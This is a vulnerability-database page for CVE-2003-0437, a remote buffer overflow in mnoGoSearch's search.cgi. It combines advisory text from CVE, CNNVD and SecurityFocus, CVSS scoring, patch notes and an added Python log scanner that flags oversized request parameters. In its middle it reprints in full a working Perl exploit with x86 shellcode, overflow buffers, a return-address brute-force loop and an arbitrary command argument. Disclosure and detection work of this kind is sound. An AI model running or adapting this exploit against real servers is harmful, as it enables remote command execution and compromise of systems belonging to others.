CVE-2003-0437
CVSS 7.5
Published: 2003-07-24 00:00:00
Last revised: 2008-09-10 15:19:00

[Original] Buffer overflow in search.cgi for mnoGoSearch 3.2.10 allows remote attackers to execute arbitrary code via a long tmplt parameter.


[CNNVD] mnoGoSearch search.cgi tmplt variable remote buffer overflow vulnerability (CNNVD-200307-024)

        
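        mnoGoSearch is a multi-purpose web-based search engine.
        mnoGoSearch does not properly bounds-check the user-supplied 'tmplt' variable. A remote attacker can exploit this to trigger a buffer overflow and possibly execute arbitrary commands on the system with the privileges of the web process.
        By supplying a string longer than 1024 bytes as the 'tmplt' variable, an attacker can overwrite arbitrary addresses on the stack; carefully crafted input may execute arbitrary commands on the system with the privileges of the web process.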
        

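- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]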

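- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found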

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0437
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0437
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-024
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/7866
(VENDOR_ADVISORY)  BID  7866
http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005543.html
(UNKNOWN)  FULLDISC  20030610 mnogosearch 3.1.20 and 3.2.10 buffer overflow

- Vulnerability information

mnoGoSearch search.cgi tmplt variable remote buffer overflow vulnerability
High risk  Boundary condition error
2003-07-24 00:00:00 2005-10-20 00:00:00
Remote
        
        

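- Advisories and patches

        Vendor patch:
        mnoGoSearch
        -----------
        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
        mnoGoSearch mnoGoSearch 3.2.10:
        mnoGoSearch Upgrade mnoGoSearch CVS
        
        http://www.mnogosearch.org/download.html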

- Vulnerability information (41)

mnoGoSearch 3.1.20 Remote Command Execution Exploit (EDBID:41)
linux remote
2003-06-10 Verified
80 pokleyzz
N/A
#!/usr/bin/perl
# 
# [ reloaded ] 
# Remote Exploit for mnoGoSearch 3.1.20 that performs
# remote command execution as the webserver user id
# for linux ix86
# by pokleyzz
#

use IO::Socket;

$host = "127.0.0.1";
$cmd  = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;

my $conn;


if ($ARGV[0]){
	$host = $ARGV[0];	
}
else {
	print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz\n\n";
	print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
	print "\thost\thostname to exploit\n";
	print "\tcommand\tcommand to execute on server\n";
	print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
	print "\tport\tport to connect to\n";
	print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
	print "\tret\treturn address default bfffd0d0\n";
	exit;
}

if ($ARGV[1]){
	$cmd = $ARGV[1];	
}
if ($ARGV[2]){
	$searchpath = $ARGV[2];	
}
if ($ARGV[3]){
	$port = int($ARGV[3]);	
}
if ($ARGV[4]){
	$suffsize = int($ARGV[4]);	
}	
if ($ARGV[5]){
	$rawret = hex_to_int($ARGV[5]);	
}

#########~~ start function ~~#########
sub hex_to_int {
	my $hs = $_[0];  
	$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) +
                         (hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
	 	
}

sub int_to_hex {
	my $in = $_[0];
	$hex = sprintf "%x",$in;
}

sub string_to_ret {
	my $rawret = $_[0];
	if (length($rawret) != 8){
		print $rawret;
		die "[*] incorrect return address ...\n ";
	} else {
		$ret = chr(hex(substr($rawret, 2, 2)));
		$ret .= chr(hex(substr($rawret, 0, 2)));
		$ret .= chr(hex(substr($rawret, 6, 2)));
    		$ret .= chr(hex(substr($rawret, 4, 2)));
    		
	}	
	
}

sub connect_to {
	#print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);
}

sub check_version {
	my $result;
	connect_to();
	print "[x] Check if $host use correct version ...\n";
	print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n"; 
	
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
		};
	
	close $conn;
	if ($result =~ /_test_/){
		print "[x] Correct version detected .. possibly vulnerable ...\n";
	} else {
		print $result;
		die "[x] New version or wrong url\n";
	}	
}

sub exploit {
	my $rw = $_[0];
	$result = "";
	# linux ix86 shellcode rip from phx.c by proton
	$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
	             ."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
	             ."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	             ."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	             ."\x41\x41"
	             ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
	             ."$cmd"
	             ."@";
	$strret = int_to_hex($rw);
	$ret = string_to_ret($strret);
	$envvar = 'B' x (4096 - length($shellcode));
	$envvar .= $shellcode;
	
	# generate query string
	$buffer = "B" x $suffsize;
	$buffer .= "B" x 4800;
	$buffer .= $ret x 200;
	
	$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
		   ."Accept: $envvar\n"
		   ."Accept-Language: $envvar\n"
		   ."Accept-Encoding: $envvar\n"
		   ."User-Agent: Mozilla/4.0\n"
		   ."Host: $host\n"
		   ."Connection: Close\n\n";
	
	&connect_to;
	print "[x] Sending exploit code ..\n";
	print "[x] ret: $strret\n";
	print "[x] suf: $suffsize\n";
	print "[x] length:",length($request),"\n";
	print $conn "$request";
	while ($line = <$conn>) { 
		$result .= $line;
		};
	close $conn;
	
}

sub check_result {
	if ($result =~ /hello/ && !($result =~ /text\/html/)){
		print $result;
		$success = 1;
	} else {
		print $result;
		print "[*] Failed ...\n";
		$success = 0;
	}
}
#########~~ end function ~~#########

&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
	&exploit($rawret);
	&check_result;
	if ($success == 1){
		exit;
	}
	sleep 1;
}

# milw0rm.com [2003-06-10]
		

- Vulnerability information

11873
mnoGoSearch search.cgi tmplt Parameter Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-06-11 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

MNOGoSearch Search.CGI TMPLT Buffer Overflow Vulnerability
Boundary Condition Error 7866
Yes No
2003-06-10 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to pokleyzz <pokleyzz@scan-associates.net>.

- Affected program versions

mnoGoSearch mnoGoSearch 3.2.10

- Vulnerability discussion

mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability.

The issue is a result of a lack of sufficient bounds checking performed on user-supplied URI parameters that are passed to the 'search.cgi' application.

It may be possible for an attacker to exploit this vulnerability and have arbitrary code executed in the context of the web-server process.
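
As a detection aid for the condition described above (a 'tmplt' value longer than 1024 bytes, and more generally oversized URI parameters passed to 'search.cgi'), the following added example, which is not part of the original advisory, flags such requests in web access logs. It assumes an Apache-style log with a quoted request line; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

MAX_PARAM_BYTES = 1024  # the advisory's figure: longer 'tmplt' values overflow

# Request field of an access-log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def oversized_params(log_line, script="search.cgi", limit=MAX_PARAM_BYTES):
    """Return [(name, decoded_byte_length)] for parameters longer than limit."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group("target"))
    if not url.path.endswith("/" + script):
        return []
    hits = []
    for pair in url.query.split("&"):
        name, _, raw = pair.partition("=")
        # Measure the value as the CGI sees it: after '+' and %XX decoding.
        size = len(unquote_to_bytes(raw.replace("+", " ")))
        if size > limit:
            hits.append((name, size))
    return hits


def scan(lines):
    """Return [(line_index, hits)] for every line with an oversized parameter."""
    return [(i, hits) for i, line in enumerate(lines)
            if (hits := oversized_params(line))]


# Constructed sample log lines (documentation addresses, benign padding).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jun/2003:12:00:01 +0000] '
    '"GET /cgi-bin/search.cgi?q=linux&tmplt=search.htm HTTP/1.1" 200 5120',
    '192.0.2.77 - - [10/Jun/2003:12:00:05 +0000] '
    '"GET /cgi-bin/search.cgi?tmplt=' + "A" * 1500 + ' HTTP/1.1" 500 0',
    '192.0.2.77 - - [10/Jun/2003:12:00:09 +0000] '
    '"GET /cgi-bin/search.cgi?q=x&ul=' + "%42" * 2000 + ' HTTP/1.1" 500 0',
    '192.0.2.10 - - [10/Jun/2003:12:00:12 +0000] '
    '"GET /index.html?pad=' + "A" * 3000 + ' HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG):
        print(f"line {index}: oversized parameters {hits}")
```

Access logs do not record request header sizes, so oversized headers such as those sent by the proof of concept on this page need a separate control, for example a request-size limit on the web server.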

- Exploit

The following proof of concept exploit has been supplied:

- Solution

The vendor has addressed this issue in the current version of this software and a fix is available at the cvs repository for this product:


mnoGoSearch mnoGoSearch 3.2.10

- Related references

 

 
